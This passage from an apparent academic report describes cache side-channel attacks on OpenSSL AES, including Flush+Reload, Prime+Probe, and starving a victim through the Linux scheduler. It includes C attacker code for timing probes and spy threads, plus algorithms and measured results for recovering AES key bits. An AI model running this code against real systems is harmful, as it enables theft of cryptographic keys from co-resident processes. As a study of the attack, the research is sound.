2. Shared table data : Here, both processes have access to the same AES tables
in the cache. The attacker now knows the location of the AES tables in
memory, and hence the cache lines to which the tables map. We are targeting
OpenSSL implementations of AES, whose tables are shared by default, so this
scenario is also quite realistic.
In the subsequent sections we look at the approaches to mount the attack in
both scenarios. We then comment on the practicality of launching the attacks
in such situations and the problems faced in the implementation.
We then propose our own approach, which is a combination of the above attacks,
and show how it helps us mount the attack in practice.
Let us first consider the scenario where the data tables are not shared and the
attacker thus does not know the position of the tables in the cache.
6.2 Cache access measurement
We can use one of the below two techniques to find out the cache block(s) accessed
by the victim process.
1. Measurement using Evict+Time[7] : In this method, we manipulate the
state of the cache before each encryption and observe the execution time of
the subsequent encryption. In a chosen-plaintext setting, the method proceeds
as follows :
• For each table l = 0, 1, 2, 3 do
– For each block y = 0, 1 . . . 15 do
(a) For plaintext p, run AES to get the blocks used by AES into the
cache.
(b) For the same plaintext p, run AES again and measure the time taken
for encryption, cachedTime, with all blocks in the cache.
(c) (Evict Phase) Evict block y of table l.
(d) For the same plaintext p, run AES again and measure the time taken
for encryption after eviction, evictedTime, with one block evicted.
(e) (Time Phase) Compare evictedTime with cachedTime; a significantly
larger evictedTime indicates that block y was used in the encryption.
2. Measurement using Prime+Probe[7] : This measurement method tries
to discover the set of memory blocks read by the encryption a posteriori, by
examining the state of the cache after encryption. The attacker allocates a
contiguous byte array A[0, ... , S*W*B−1]. The method proceeds as follows :
• For each table l = 0, 1, 2, 3 do
– For each block y = 0, 1 . . . 15 do
(a) Access the W memory blocks in A that map to the same cache set
as block y, thereby evicting y.
(b) (Prime Phase) Read the same W memory blocks again and measure
the time taken to read all of them, cachedTime, with all W blocks
in the cache.
(c) For plaintext p, run AES to get the blocks used by AES into the
cache.
(d) (Probe Phase) Read the same W blocks once more and measure the
time taken; a time noticeably larger than cachedTime indicates that
the encryption used block y.
Figure 6.1: Fig a,b,c are for Evict-Time, while Fig d,e are for Prime-Probe [7]
The problem with the Evict+Time method is that it gives information about only
one table access per encryption. So, to get information about all the table accesses
during a particular encryption, we need to run the encryption of the same plaintext
once for each cache set. If we assume the AES tables occupy 64 cache blocks, we
need to run Evict+Time 64 times to measure the accesses of just a single encryption.
This scenario is quite unrealistic, as it requires the same data to be encrypted again
and again.
Here, if we do not know the offset at which the tables start, we need to fill the
whole cache again and again and measure the cache accesses of the small subset of
the cache in which the tables reside. One optimization is to first find the location
of the AES tables in memory and then apply the above strategies while filling only
a small portion of the cache. To find the location of the tables, we can use the
Prime+Probe attack: we simply give a score to a cache set each time we find that
some process has accessed it. If we do this repeatedly, there is a high chance that
the locations accessed by AES get a high score, because they have been accessed
every time we probed, while other sets may not be accessed each time[9].
Figure 6.2: Graph showing cache sets with high Access Time. These are likely tobe the location where AES tables are mapped[9].
Once we have fixed the bounds of the tables, we can fill just these cache lines in
the Prime+Probe attack. The above method will not work in the presence of
hardware prefetching, where for every line accessed the next line is automatically
fetched. We will discuss this in more detail in further sections.
After getting the table accesses for each encryption, we use the first round and
second round attacks to obtain the final key. These are discussed in the next
sections.
6.3 First Round Attack
For attacking AES, a natural approach is to observe the lookups performed in the
first round[7]. The table accesses are simply xi = pi ⊕ ki for all i = 0, . . . , 15, each
of which depends on only one key byte and one plaintext byte. We already have the
plaintext for the encryption, so any knowledge about xi reveals some information
about the key bits.
Since each cache block contains 16 table entries and each table contains 256
entries, each table is mapped to 16 cache blocks. Thus any information about the
access of a particular cache block gives information about its 16 entries as a whole,
i.e. about the upper 4 bits of the table index. So, using the one round attack we
will be able to figure out the upper 4 bits of each key byte.
Ideally, we would require the first 16 accesses in order. However, in the given
scenario we do not have that leverage. Rather, we have the cache accesses of the
whole encryption, i.e. we know which of the 64/80 cache blocks were accessed by
the victim process during the whole encryption. In such a scenario, we can discover
partial information about the key bytes as follows.
Consider the case where 〈pi ⊕ ki〉4 is indeed present in the list of accesses of that
particular encryption. Then this ki is a probable candidate for the actual key byte.
However, if 〈pi ⊕ ki〉4 is not present in the list of accesses, we can say for sure that
this value is definitely not the key byte: had it been, the access corresponding to
〈pi ⊕ ki〉4 would have to be present in the list, as that cache line must have been
accessed in the first round itself.
In a real scenario, due to noise and measurement inaccuracy, we do not eliminate
key values whose corresponding access is not found; rather, we give each candidate
a score of 1 every time it is found and 0 when it is not.
At the end, when we plot the graph, the actual key values should show a peak,
because they must have been present in all the encryptions.
Algorithm 2 specifies how the one round attack can be implemented.
Note: for plaintext bytes 0, 4, 8, 12 we look at table T0, and so on[1].
Algorithm 2 One Round Attack
1: while true do
2:   for each plaintext pi do
3:     for each possible key value ki (0-255) do
4:       xi ← 〈pi ⊕ ki〉4
5:       if xi is present in list of accesses then
6:         graph[i][ki] ← graph[i][ki] + 1
7:       end if
8:     end for
9:   end for
10: end while
6.4 Second Round Attack
The one round attack above has reduced the key search space from 128 bits to 64
bits, as for each key byte we are able to retrieve 4 bits. The second round attack is
based on the same principle of cache accesses as the first round. The only difference
is that, unlike the first round, where the cache accesses are simply 〈pi ⊕ ki〉4, the
cache accesses in the second round depend on the outcome of the first round: each
round scrambles the data in a non-linear fashion.
For the second round, we specifically exploit these 4 equations[16]:
Figure 6.3: Equations for second round attack
Here, the key bytes which are S-boxed affect the result of an equation in a non-
linear way. That means a change in the least significant 4 bits of such a key value
can affect the most significant bits of the result. However, this is not the case for
the key bytes which are directly XORed. If we observe these equations, we notice
that for each equation we only have to find the lower bits of 4 key bytes. For
example, in the first equation, the lower bits of only k0, k5, k10, k15 affect the most
significant bits of the result, i.e. they affect the table access.
So now we have 16 possible values for each key byte, and each equation involves
4 of them. Thus we have a total of 16^4 = 65536 combinations per equation. For
each combination, we apply the same principle as before, i.e. giving a candidate
score to each combination whose predicted access appears in the list of accesses.
These attacks are based on the assumption that we accurately obtain the accesses
of the whole encryption. This requires proper synchronization between the victim
and attacker processes, which is not practical in most scenarios.
Chapter 7
Cache attacks by exploiting CFS
7.1 Overview
The synchronous attack explained in the previous section is an efficient way to
recover the key; however, it is limited to scenarios where the attacker obtains
known plaintexts and has some interaction with the encryption code which allows
him to execute code synchronously before and after encryption. In this section we
describe a class of attacks that eliminates these prerequisites. The attacker exe-
cutes his own program on the same processor as the victim program performing AES
encryption, but with no explicit interaction such as inter-process communication;
the only knowledge assumed is of a non-uniform distribution of the plaintexts
or ciphertexts.
This chapter describes an attack based on the assumption that the spy process
is able to observe every single memory access made by the victim. This high
granularity is achieved by exploiting the behaviour of the Completely Fair Scheduler
(CFS) used by the Linux kernel.
In the next section, we discuss how CFS works and how it can be exploited to
allow the victim process so little time that it can make only one memory access in
that duration.
7.2 Completely Fair Scheduler
To gather table accesses in the shared-memory scenario, we need some kind of
synchronization mechanism so that the attacker can observe each and every victim
access.
For this, we as attackers require that, whenever we want, the Operating System
preempt the victim process and let the attacker run, which in turn gathers the
required memory accesses. Allotting the CPU to processes is the job of the
scheduler. Preempting the victim process at will and gathering the required
accesses is not easy, as the scheduler has to maintain fairness among all processes
while achieving maximum throughput at the same time.
So, to achieve this, we need some kind of attack mechanism on the scheduling
capability of the Operating System. This chapter deals with exploiting an imple-
mentation of the scheduler known as the Completely Fair Scheduler (CFS).
Let us discuss briefly how it performs the task of scheduling. This scheduler
tries to behave like an ideal system while giving a fair share to each process. To
achieve this, it maintains a virtual runtime for each process, which denotes the time
the process has spent running; the virtual runtime of the currently running process
therefore keeps increasing.
CFS maintains fairness by allowing a process to increase its virtual runtime only
up to a certain bound, after which it preempts the process and selects the
process with the least virtual runtime at that moment.
This is clearly explained with the help of Figure 7.1. Here, three processes
are running on a multitasking system. At the start, process 1 is activated because it
has the least virtual runtime. As it runs, its virtual runtime increases, and at the
point where the maximum unfairness is reached, the next process is scheduled.
Figure 7.1: Functioning of the Completely Fair Scheduler.[11]
7.3 Attacking CFS
This feature of fairness can be exploited by the attacker in the following way. The
basic idea is that the attacker process requests most of the available CPU while
leaving only very small intervals for the victim process. In each small interval, the
victim accesses a memory location, thus bringing the table into the cache, and is
scheduled out. The attacker then regains control and can figure out the cache line
accessed by the victim. To achieve this, the attacker process launches a few hundred
identical threads which initialize their virtual runtimes to as low a value as possible
by blocking for a sufficient amount of time. The following steps are then performed
in a round robin fashion:
• Upon getting activated, thread i first measures which memory accesses were
performed by V since the previous measurement.
• It then computes tsleep and twakeup, which designate the points in time when
thread i should block and thread i + 1 should unblock, respectively. It pro-
grams a timer to unblock thread i + 1 at twakeup.
• Finally, thread i enters a busy wait loop until tsleep is reached, where it blocks
to voluntarily yield the CPU.
Figure 7.2: Denial Of Service attack on CFS.[11]
Due to the large number of threads, each thread's virtual runtime increases very
slowly, and thus whenever the scheduler looks for a process to run, it will always
choose one of the attacker's threads over the victim.
7.4 Retrieving Key
Once we get the cache accesses, we can use the following method[11] to retrieve the
key.
AES encryption can be described by this single relation:
Y = M • s(X̄) ⊕ K. (7.1)
where X and Y are the state matrices before and after a particular encryption round,
M is the constant matrix of the MixColumns step, X̄ denotes the row-shifted
matrix X, and K is the round key.
Also, any two consecutive rounds of the same encryption can be put together in
the form of this equation:
kⁱ∗ = yⁱ∗ ⊕ (M • s(x̄ⁱ))∗ (7.2)
where aⁱ denotes a 4-byte column vector,
ā denotes that row shifting has been applied, and
a∗ denotes the bits leaked from the cache accesses, which are 5 per byte in the case
of the compressed table and 4 otherwise.
The basic steps for finding the key bits are:
1. We treat each of the N accesses as the beginning of a round.
2. For each such beginning, we calculate the potential key candidates from the
above equation.
3. Based on the different sets of potential candidates, we determine the most
probable keys. This relies on the fact that, if the potential beginning is correct,
the possible keys generated from it are correct.
Chapter 8
Design & Implementation of
Espionage Infrastructure
8.1 Flush+Reload Technique
The Flush+Reload attack is a powerful access-driven cache-based side-channel attack
technique. It was proposed by Gullasch et al.[11] but was first named by Yarom et
al.[18]. It employs a spy process to check whether specific cache lines have been
accessed by the victim's code. The attack is carried out by the spy process, which
works in 3 stages:
Flushing Stage :
In this stage, the attacker flushes the desired memory lines from the cache using the
clflush instruction, thereby making sure that they have to be retrieved from main
memory the next time they are accessed. The attack works even if attacker and
victim reside on different CPU cores, as clflush flushes the memory lines from the
caches of all cores.
Accessing the target :
The attacker waits until the victim process runs a fragment of code which might use
the memory lines that were flushed in the first stage.
Reloading Stage :
In the reload stage the attacker reloads the previously flushed memory lines and
measures the time this takes. Depending on the time taken to fetch the memory
lines, the attacker decides whether the victim accessed them: if the victim accessed
a memory line, it will be present in the cache; if not, it won't be. The following
figure shows the timing diagrams of various scenarios in which victim and attacker
access the same cache line. Figures A and B show the timing diagram without and
with the victim accessing the cache line. While doing the experiments, we must
also consider cases where the victim does not access the cache precisely at the time
the attacker expects. The remaining three diagrams, C, D and E, show the timings
for such cases.
Figure 8.1: Flush - reload attack timings [18]
The implementation of the attack is shown in Figure 8.2. The code measures the
time to read the data at a memory address and then evicts the memory line from
the cache[18]. The implementation is given as inline assembly within the asm
command. The assembly code takes as input the address stored in %ecx (Line 16)
and returns the time taken to read this address in the register %eax, which is stored
in the variable time (Line 15).
The threshold used in the attack is system dependent. For our Core i5 system,
we set it to 100, as discussed in the next section.
Figure 8.2: Code for the Flush+Reload Technique [18]
8.2 Our espionage infrastructure
Our espionage infrastructure, shown in Figure 8.3, consists of three important parts:
the Spy Controller [SC], the Spy Ring and the Centre of Advanced Analytics [CAA].
The SC, residing on one CPU core, controls the spy threads running on another core.
The CAA, implemented with analytical abilities, is responsible for providing dynamic
delay instructions to the SC so that V can be restricted to fewer accesses to the memory
lines. The lower the number of memory-line accesses by the victim, the more accurate
the results.
Figure 8.3: The Espionage Network.
For a successful attack, our aim is to execute the spy threads and V as shown in
Figure 8.4. V runs on a core where the spy ring is also scheduled by the SC.
This makes the OS divide the CPU time quanta between the spies and the victim. We
call each instance of V (when V gets its turn to run) a run. In each
run, V performs AES encryptions and brings data into the cache. The default
time slice (or quantum) assigned by the OS to a process is large enough to make
thousands of cache accesses. So, to stop the OS from granting this large quantum to
V, our espionage infrastructure restricts it to a very small time slice.
Figure 8.4: Timeline of victim and spy threads.
Scheduling is a central idea in a multitasking Operating System, where CPU time
has to be multiplexed among the running processes, giving an illusion of parallel execu-
tion. The Completely Fair Scheduler has been included in all Linux systems starting
from kernel version 2.6.23[11].
To ensure that fair time is allocated to all processes, the CFS introduces the
concept of a virtual runtime associated with each process. In an ideal scenario, if
the total number of processes running on a CPU core is n, then the fraction of CPU
time allocated to each process is 1/n. To achieve this on a real system, the
CFS maintains a virtual runtime τi for every process i. In Figure 8.4, the sum of
the CPU times allocated to V is equal to that of the times given to each of the spy
threads running on that core.
In our attack implementation, each spy thread measures the access time of each
cache line containing the AES lookup tables and then flushes the tables from all
levels of cache. After performing this work, each spy thread signals the SC through
a shared variable, finished, so that the next thread of the ring can be woken.
It then waits for an amount of time δ1 before blocking on a condition variable. This is
where the victim comes into the picture: with all spy threads in the blocked state,
the OS resumes the execution of the victim (V).
Algorithm 3 Spy Threads
1: SpyThreads Ti
2: while true do
3:   for each cacheLine containing AES tables do
4:     if accessTime[cacheLine] < THRESHOLD then
5:       isAccessed[cacheLine] ← true
6:       clflush(cacheLine)
7:     end if
8:   end for
9:   mutexLock(var)
10:  finished ← true
11:  mutexUnlock(var)
12:  delay loop by time = δ1
13: end while
The SC continuously checks the finished flag; once it is true, it delays for time
δ2 and then signals the next spy in the ring to start its execution. The delay δ2 is
optional, as it is only needed to tune the number of victim accesses to what is
suitable for the attack. So, we can control the number of accesses to the lookup
tables by varying the value of δ2.
Our attack has been designed to work on multi-core systems. Before the actual
attack begins and the victim starts performing AES encryptions, the attacker
schedules its ring of spy threads onto the same CPU core where V resides. The SC
works alone on another CPU core so that it can send its signals immediately, without
any battle for the CPU. The Centre of Advanced Analytics (CAA) can be employed
on any remaining core, including the core on which the SC executes.
The delay loops δ1 and δ2 are used to fine-tune the whole setup so that the victim
can access only a minimum number of cache lines in its time quantum. Increasing
the value of δ1 decreases the total number of accesses by the victim, as the delay
consumes a portion of the victim's time. In contrast, increasing the value of δ2 allows
V to execute for δ2 extra time, so the number of cache-line accesses by V increases.
Algorithm 4 Spy Controller
1: while true do
2:   while finished ≠ true do
3:   end while
4:   delay loop by time = δ2
5:   condSignal(nextThread)
6:   mutexLock(var)
7:   finished ← false
8:   mutexUnlock(var)
9: end while
The value of THRESHOLD in Algorithm 3 was decided on the basis of the time
taken to bring data back into the cache after flushing it from all levels of cache
memory. The distribution of the time taken (in ticks) for cache hits and misses is
presented in Figure 8.5. On this basis, we fixed the threshold at 100 ticks.
Figure 8.5: Frequency Vs Cache Access Time(ticks).
8.3 Approach for Attack
The previous attack is based on the assumption that we can observe each access
made by the victim. A single table access generally takes less than 100 ns to
complete, which would mean the victim is scheduled for only around 100 ns every
time it gets the CPU; this is quite unrealistic. To relax this constraint we propose a
combination of both attacks, where we exploit CFS to gather the memory
accesses and use the last-round table as a synchronization mechanism to identify the
table accesses of an encryption.
In this case, we assume the shared-table scenario, as the OpenSSL implementa-
tions we are targeting share the tables by default. Here, we assume that the victim
is continuously encrypting data and thus accessing the tables. This assumption
is quite realistic: consider a victim cloud service offering encrypted data storage
as a service under a key unknown to the user. The user, in this case the attacker,
can ask the cloud service to encrypt data, upon which it starts its encryption
sequence and continues encrypting until the end.
We will exploit CFS to gather the memory accesses of the victim, but unlike the
previous case, we do not require each individual access; rather, we can allow the
victim a chunk of accesses at a time. For example, we report experimental results
based on chunks of fewer than 30 accesses.
After getting the accesses, we propose the following algorithm for achieving the
synchronization.
8.3.1 Algorithm
For each group of accesses, check the following: if the group contains some
last-round table entries, consider that group and the next 2 groups as the table
accesses of the next encryption.
This is because the group containing the last-round table accesses can be in one
of several states, and for each case we justify our approach in Chapter 10.
After getting the accesses, we will use first round and second round attacks to
recover the complete AES key as described in section 6.3 and section 6.4.
Chapter 9
Coding
9.1 Experimental Setup
Our experiments were performed on an Intel(R) Core i5-2540M CPU @ 2.60GHz ma-
chine running Debian Kali Linux 1.1.0, 64-bit, kernel version 3.14.5/3.18, using the C
implementation of AES in OpenSSL 0.9.8a. This version of OpenSSL uses a separate
table for the last round of encryption. The Core i5 has a 3-level cache architecture.
The L1 cache is 32KB (8-way associative), L2 cache is 256KB (8-way associative)
and L3 cache is 3MB (12-way associative). Each CPU core has private L1 and L2
cache whereas L3 is shared among different CPU cores.
This chapter includes code snippets of the major components of our espionage
infrastructure. The source code for the attack has been written mainly in C,
as C is the language in which the kernel is programmed. We have also written
various scripts in Python to automate the attack and generate the results. The
major work here is performed by the SC and spy threads; the victim performs
the AES encryptions. For the AES encryptions, we have used the aes_core file,
which contains the tables and the AES_encrypt() function. In our victim code, AES
encryption is performed 100 times with different plaintexts.
Following are the major sections of the code in our attacker process:
9.2 Attacker Source Code
#define _GNU_SOURCE   // Assuming all header files included
#ifndef _POSIX_THREAD_PROCESS_SHARED
#error This system does not support process shared mutex
#endif

#define NUMTHREADS 15
#define MAXCOUNT 10000

int segmentId;
int segmentChildId;
int segmentcheckId;
int *currThread;
int *child;
int *check_state;
pthread_cond_t *cvptr[NUMTHREADS+1];
pthread_condattr_t cattr[NUMTHREADS+1];

pthread_cond_t *cvptrChild;               // Condition variable pointer of child
pthread_condattr_t cattrChild;            // Condition variable attributes of child
pthread_mutex_t *mptr[NUMTHREADS+1];      // Mutex pointers
pthread_mutexattr_t matr[NUMTHREADS+1];   // Mutex attributes

pthread_mutex_t *mptrChild;               // Mutex pointer of child
pthread_mutexattr_t matrChild;            // Mutex attributes of child

int shared_mem_id;        // shared memory id
int *mp_shared_mem_ptr;   // shared memory ptr -- pointing to mutex
int *cv_shared_mem_ptr;   // shared memory ptr -- pointing to condition variable

inline void clflush(volatile void *p)
{
    asm volatile ("clflush (%0)" :: "r" (p));
}

unsigned long probe(char *adrs)
{
    volatile unsigned long time;
    asm volatile (
        "  mfence             \n"
        "  lfence             \n"
        "  rdtsc              \n"
        "  lfence             \n"
        "  movl %%eax, %%esi  \n"
        "  movl (%1), %%eax   \n"
        "  lfence             \n"
        "  rdtsc              \n"
        "  subl %%esi, %%eax  \n"
        "  clflush 0(%1)      \n"
        : "=a" (time)
        : "c" (adrs)
        : "%esi", "%edx");
    return time;
}

struct shared_use_st
{
    unsigned long long access_count;
    int flag;
    int thread_state;
    unsigned long long check_count;
};

struct shared_use_st *shared_stuff;

void create_shared_memory()
{
    void *shared_memory = (void *)0;
    int shmid;

    shmid = shmget((key_t)1234, 4096, 0666 | IPC_CREAT);
    shared_memory = shmat(shmid, (void *)0, 0);
    if (shared_memory == (void *)-1)
    {
        fprintf(stderr, "shmat failed\n");
        exit(EXIT_FAILURE);
    }
    shared_stuff = (struct shared_use_st *)shared_memory;
}

typedef struct thread_parameters {
    long id;
    int loop_count;
} THREAD;

void *parentThreads(void *thread_id)
{
    long tid = (long)thread_id;
    int sid = syscall(SYS_gettid);
    int counter = 0, sum;
    unsigned long long start, end;
    unsigned long long changed_shared_variable_access_count[MAXCOUNT];
    unsigned long long changed_shared_variable_check_count[MAXCOUNT];
    unsigned long Access_Time[MAXCOUNT][80] = {0};
    int k = 0;
    FILE *fp, *fp2, *fp3;
    pthread_t thread = pthread_self();

    cpu_set_t my_set;
    CPU_ZERO(&my_set);
    CPU_SET(2, &my_set);
    sched_setaffinity(0, sizeof(cpu_set_t), &my_set);
    int s;

    const u32 *p0 = address(0);
    const u32 *p1 = address(1);
    const u32 *p2 = address(2);
    const u32 *p3 = address(3);
    const u32 *p4 = address(4);
    void *p5 = &AES_set_encrypt_key;
    void *p6 = &AES_encrypt;

    // Flush all lookup tables from the cache
    for (s = 0; s < 18; s++)
    {
        clflush((void *)(p0 + s*16));
        // similarly for all other tables
    }
    while (1)
    {
        pthread_mutex_lock(mptr[tid]);
        while (*currThread != tid)
        {
            pthread_cond_wait(cvptr[tid], mptr[tid]);
        }
        pthread_mutex_unlock(mptr[tid]);

        // store value of shared variable at the time of receiving signal
        changed_shared_variable_access_count[counter] = shared_stuff->access_count;

        if (counter == 30 && tid == 0)  // notify V to start AES; delayed so AES starts in a stable condition
            shared_stuff->flag = 1;

        if (*currThread == tid)
        {
            // find access times
            for (s = 0; s < 16; s++)
            {
                k = 0;
                Access_Time[counter][s + 16*k] = probe((char *)(p0 + s*16));
                k = 1;
                // similarly for all four remaining tables
            }

            *currThread = (*currThread + 1) % NUMTHREADS;
            // signal the child
            pthread_mutex_lock(mptrChild);
            *child = 1;
            pthread_mutex_unlock(mptrChild);
        }
        counter++;
        volatile int check_counter = 0;
        while (check_counter++ < 15);

        if (counter == MAXCOUNT/NUMTHREADS)
        {
            break;
        }
    }
    pthread_mutex_lock(mptrChild);
    for (counter = 0; counter < (MAXCOUNT/NUMTHREADS); counter++)
    {
        for (k = 0; k < 5; k++)
        {
            for (s = 0; s < 16; s++)
            {
                // printf("%ld, Access_Time[%d]=%lu\n", tid, s+16*k, Access_Time[counter][s+16*k]);
                if (Access_Time[counter][s + 16*k] < 150)   // ==44 || ==48
                    printf("%d,%ld,%llu,Access_Time,[%d],%lu\n", counter, tid,
                           changed_shared_variable_access_count[counter],
                           s + 16*k, Access_Time[counter][s + 16*k]);
            }
        }
    }
    pthread_mutex_unlock(mptrChild);

    pthread_exit(NULL);
}

int main()
{
    int rtn;
    size_t shm_size;

    /* initialize shared memory segment */
    shm_size = (NUMTHREADS+1)*sizeof(pthread_mutex_t)
             + (NUMTHREADS+1)*sizeof(pthread_cond_t);  // one extra condition variable added

    if ((shared_mem_id = shmget(IPC_PRIVATE, shm_size, 0660)) < 0)
    {
        perror("shmget"), exit(1);
    }
    if ((mp_shared_mem_ptr = (int *)shmat(shared_mem_id, (void *)0, 0)) == NULL)
    {
        perror("shmat"), exit(1);
    }

    int nt;
    unsigned char *byte_ptr = (unsigned char *)(mp_shared_mem_ptr);
    for (nt = 0; nt <= NUMTHREADS; nt++) {
        mptr[nt] = (pthread_mutex_t *)byte_ptr;
        byte_ptr += sizeof(pthread_mutex_t);
        cvptr[nt] = (pthread_cond_t *)byte_ptr;
        byte_ptr += sizeof(pthread_cond_t);
    }
    mptrChild = (pthread_mutex_t *)mptr[NUMTHREADS];
    cvptrChild = (pthread_cond_t *)cvptr[NUMTHREADS];

    // Setup mutexes and condition variables
    for (nt = 0; nt <= NUMTHREADS; nt++)
    {
        if ((rtn = pthread_mutexattr_init(&matr[nt])))
        {
            fprintf(stderr, "pthread_mutexattr_init: %s", strerror(rtn)), exit(1);
        }
        if ((rtn = pthread_condattr_init(&cattr[nt])))
        {
            fprintf(stderr, "pthread_condattr_init: %s", strerror(rtn)), exit(1);
        }
    }

    int shareSize = sizeof(int) * (2 + 1);
    segmentId = shmget(IPC_PRIVATE, shareSize, 0660);
    currThread = (int *)shmat(segmentId, NULL, 0);
    *currThread = 0;    // shared variable between parent and child

    int sharechild = sizeof(int) * (2 + 1);
    segmentChildId = shmget(IPC_PRIVATE, sharechild, 0660);
    child = (int *)shmat(segmentChildId, NULL, 0);
    *child = 0;         // shared variable between parent and child

    int sharecheck = sizeof(int) * (2 + 1);
    segmentcheckId = shmget(IPC_PRIVATE, sharecheck, 0660);
    check_state = (int *)shmat(segmentcheckId, NULL, 0);
    *check_state = 0;   // shared variable between parent and child

    create_shared_memory();
    shared_stuff->thread_state = 2;
    shared_stuff->check_count = 0;

    pid_t pid, id;
    int i;

    pid = fork();
    id = getpid();

    if (pid > 0)
    {
        // In parent
        pthread_t threads[NUMTHREADS];
        int rc;
        long t;
        for (t = 0; t < NUMTHREADS; t++)
        {
            rc = pthread_create(&threads[t], NULL, parentThreads, (void *)t);
            if (rc)
            {
                printf("ERROR; return code from pthread_create() is %d\n", rc);
                exit(-1);
            }
        }
        pthread_exit(NULL);
    }
    else
    {
        // In child
        pthread_t thread = pthread_self();
        cpu_set_t my_set;                 /* Define the CPU-set bit mask. */
        CPU_ZERO(&my_set);                /* Initialize it all to 0, i.e. no CPUs selected. */
        CPU_SET(1, &my_set);              /* Set the bit that represents core 1. */
        sched_setaffinity(0, sizeof(cpu_set_t), &my_set);  /* Set affinity of this process. */
        int check_counter = 0;
        long int counter = 0;
        while (counter++ < MAXCOUNT)
        {
            while (!*child);              // wait till set by a spy thread
            volatile int wait_child = 0;
            // while (wait_child++ < 10);

            pthread_mutex_lock(mptrChild);
            *child = 0;
            pthread_mutex_unlock(mptrChild);
            pthread_cond_signal(cvptr[*currThread]);
        }
    }
    return 1;
}
Chapter 10
Results and Analysis
The first thing to be decided is the threshold on the time taken to access the
victim's cache lines. From the previous experiment we have seen in Figure 8.5
that the time taken by V to access memory lines from the cache is in the range
of 32-68 ticks on our system. So we set the threshold value to 100, which clearly
separates the access times of data served from the cache and from main
memory (which takes more than 200 ticks).
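The resulting hit/miss decision can be sketched as follows. This is a simplified illustration; the actual attack code is in C, and the names here are hypothetical.

```python
THRESHOLD = 100  # ticks: cache hits measured around 32-68, main memory above 200

def accessed_lines(probe_times):
    """probe_times maps a cache-line index to its measured probe time in
    ticks. Lines below the threshold were still cached, i.e. (probably)
    touched by the victim since the last flush."""
    return sorted(line for line, ticks in probe_times.items()
                  if ticks < THRESHOLD)
```

Anything between the two clusters (say 100-200 ticks) is ambiguous, which is why the threshold is placed well above the hit range and well below the miss range.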
On the basis of the threshold value decided in Section 8.2, we have performed
our experiment using our espionage network with different numbers of spy threads.
The number of accesses by the Victim should decrease as we increase the number of
spy threads (Section 8.2). The number of distinct memory accesses is clearly
depicted in Figure 10.1 and Figure 10.2. We are currently able to restrict V to
between 18-27 accesses in each run, which is enough for the success of our attack.
For a proper understanding of our results, we have written code in our Spy
Controller (Chapter 9) to print to a file the exact cache lines accessed by the
Victim and detected by the spy in its turn. Our access results thus include the
number of cache-line accesses by the Victim in each run, as detected in the spy's
turn, with the corresponding AES table information.
Figure 10.1: #Accesses per run (#spy threads = 10).
In Figure 10.1, where the spy ring has 10 threads, we can see that the
average accesses are in the range of 22-37, while in the case of Figure 10.2,
where the ring contains 40 spy threads, the number of accesses is in a suitable
range for our attack.
Figure 10.2: #Accesses per run (#spy threads = 40).
For the same plaintext encrypted 100 times by the Victim, the results of a few
accesses are shown in Figure 10.3. It clearly depicts the start of encryption,
where all the accesses are to the AES look-up tables T0, T1, T2 and T3. Accesses
to the fifth table T4 mark the end of the encryption, as cache lines in the range
64-79 are being accessed. Sometimes the table accesses of a new encryption can be
noticed in the last round of the previous encryption. This indicates that the group
holding the last round of the previous encryption includes a few table accesses
from the beginning of the next encryption.
Figure 10.3: Cache accesses detected by Spy threads.
We can resolve the above-stated conflicting accesses for our attack as explained
in Table 10.1.
Here, we have taken ideal memory accesses from an actual implementation of
AES encryption in OpenSSL v0.9.8a. This part basically solidifies our point
that, if we apply the modifications discussed in the previous section, we will
still be able to recover the keys.
For this set-up, we modified the OpenSSL AES code to print the table accesses
to a file as table offsets. We gathered this data for as many as 100,000
encryptions with a single key.
Results worth mentioning are explained here with graphs, as in [4].
1. In the ideal scenario, where the attacker could get all the accesses of an
encryption, and in order, only one encryption is needed to get the key from the
first round attack, and fewer than 5 encryptions for the second round attack to
recover the complete key.
1. Group contents: (A) accesses from the current encryption (9th round);
   (B) last round accesses; (C) accesses from the next encryption (1st round).
   Observation: As we are not concerned with entries other than the first two
   rounds, data from the current encryption is of no use to us. But the data
   containing the first round of the next encryption is important to us, so it
   is better to consider all accesses as next-encryption accesses.
2. Group contents: (A) accesses from the last table; (B) accesses from the
   first and second rounds of the next encryption.
   Observation: Here also we need the data of the next encryption, so we
   consider the accesses as those of the new encryption.
3. Group contents: (A) accesses from the 8th and 9th rounds of the current
   encryption; (B) last round accesses.
   Observation: Here, even though the data of the next encryption is not
   present, we cannot be sure of this situation, so we simply consider these
   accesses as next-encryption accesses and, along with the next two groups of
   accesses, treat them as the new encryption.
4. Group contents: (A) accesses from the 8th and 9th rounds of the current
   encryption; (B) a few entries of the last round.
   Observation: This scenario is similar to the previous one, and we will have
   no problem considering these accesses as new-encryption accesses.
Table 10.1: Conflicting access resolution
2. We have varied the number of accesses available to the attacker in each
encryption, both with pre-fetching and without, in the perfectly synchronized
situation where the attacker knows exactly the start of each encryption.
To get these results, we ran our attack on various numbers of encryptions and,
for each key byte under analysis, plotted the score it received during the
analysis. The complete algorithm is explained in Section 6.3.
Here, we take the case of key byte 8 (k8). Below are two graphs showing the
plot for 1100 encryptions (left) and 1300 encryptions (right), with hardware
pre-fetch enabled and considering the whole 160-access chunk. While in the left
graph the peak, although visible, is not very clear, in the right graph the
clarity begins to grow. If we increase the number of encryptions, the difference
will increase much more.
Figure 10.4: Differences in the peak for 1100 encryptions.
From the next graph, we can clearly see that as the number of accesses available
to the attacker as a bunch grows, the number of encryptions needed increases.
This is reasonable because, with the increase in the number of accesses in a
group, more cache lines are active, which decreases the certainty about the
first-round accesses.
With hardware pre-fetching enabled, the number of accesses is definitely higher
than in its counterpart with no pre-fetching, but it follows the same behaviour
as observed in the case of no pre-fetching.
Figure 10.5: Differences in the peak for 1300 encryptions.
Figure 10.6: Encryptions required (perfectly synchronized).
3. The above point assumes that the attacker has perfectly synchronized data,
with the start of encryption known to him/her. Here, we consider the case where
the start of encryption is not known to the attacker; rather, the attacker gets
a continuous chunk of accesses. The variation seems reasonable: with increasing
chunk size, the number of encryptions required grows, as each chunk contains
more accesses and thus a lower probability of isolating the first round. The
synchronization is achieved from the last-table accesses, applying the same
algorithm as given in Table 10.1.
Figure 10.7: Encryptions required (synch. from last-table accesses).
4. The above results are for the first round attack, where we could only
retrieve 4 bits of every byte of the key. The second round attack is much more
complex, and the results show the same.
For the second round attack, we calculate results for four key bytes
simultaneously. Thus, we have 2^16 possible options, which cannot all be plotted
in a graph. To determine the correct key sequence, we used the following simple
technique: we calculated the highest and the second-highest score, and when the
difference between the two scores is noticeable enough, we conclude that the key
combination with the highest score is our key.
